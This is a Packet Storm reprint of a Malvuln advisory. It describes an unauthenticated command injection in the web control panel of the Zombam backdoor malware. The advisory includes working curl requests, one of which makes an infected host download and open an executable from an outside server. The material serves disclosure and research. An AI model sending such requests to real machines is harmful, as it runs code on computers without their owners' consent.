what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Zombam.l MVID-2021-0277 Code Execution

Backdoor.Win32.Zombam.l MVID-2021-0277 Code Execution
Posted Jul 5, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Zombam.l malware suffers from a code execution vulnerability.

tags | exploit, code execution
systems | windows
SHA-256 | ee19ce806cc0d4edb708c50fbad6626f75c0b59d26bcfabb94ebdcbb0d03572d

Backdoor.Win32.Zombam.l MVID-2021-0277 Code Execution

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/9729e9fc004ea49d3c2ddee28736dae3_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.l
Vulnerability: Unauthenticated URL Command Injection
Description: Zombam malware listens on TCP port 80 and deploys a HTML Web UI for basic remote administration capability. The RAT has option to kill processes by clicking a link E.g. href="/kill&smss.exe&" this would terminate the smss.exe process. By changing "kill" to exec "exec&<command-to-run>" you can start arbitrary processes. Crafting a successful injection requires padding an extra character to the end of the executable extension you want to call, otherwise it gets truncated and will fail. Example, curl http://x.x.x.x/exec&calc.exe results in the following message: "error! calc.ex cannot be executed". However, padding the extra character so ".exe" becomes ".exee", curl http://x.x.x.x/exec&calc.exee will successfully process and we will get the response "calc.exe executed".

welcome 2 HTTP_RAT infected computer }]
menu [running processes] [browse] [computer info] [stop httprat] [have suggestions?] [homepage]

Type: PE32
MD5: 9729e9fc004ea49d3c2ddee28736dae3
Vuln ID: MVID-2021-0277
Disclosure: 07/03/2021

Exploit/PoC:
Opens the default web-browser on the infected host to download the file "DOOM.exe" from the server.

CURL http://x.x.x.x/exec&http://hyp3rlinx.altervista.org/DOOM.exee

HTTP Response:
http://hyp3rlinx.altervista.org/DOOM.exe executed

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close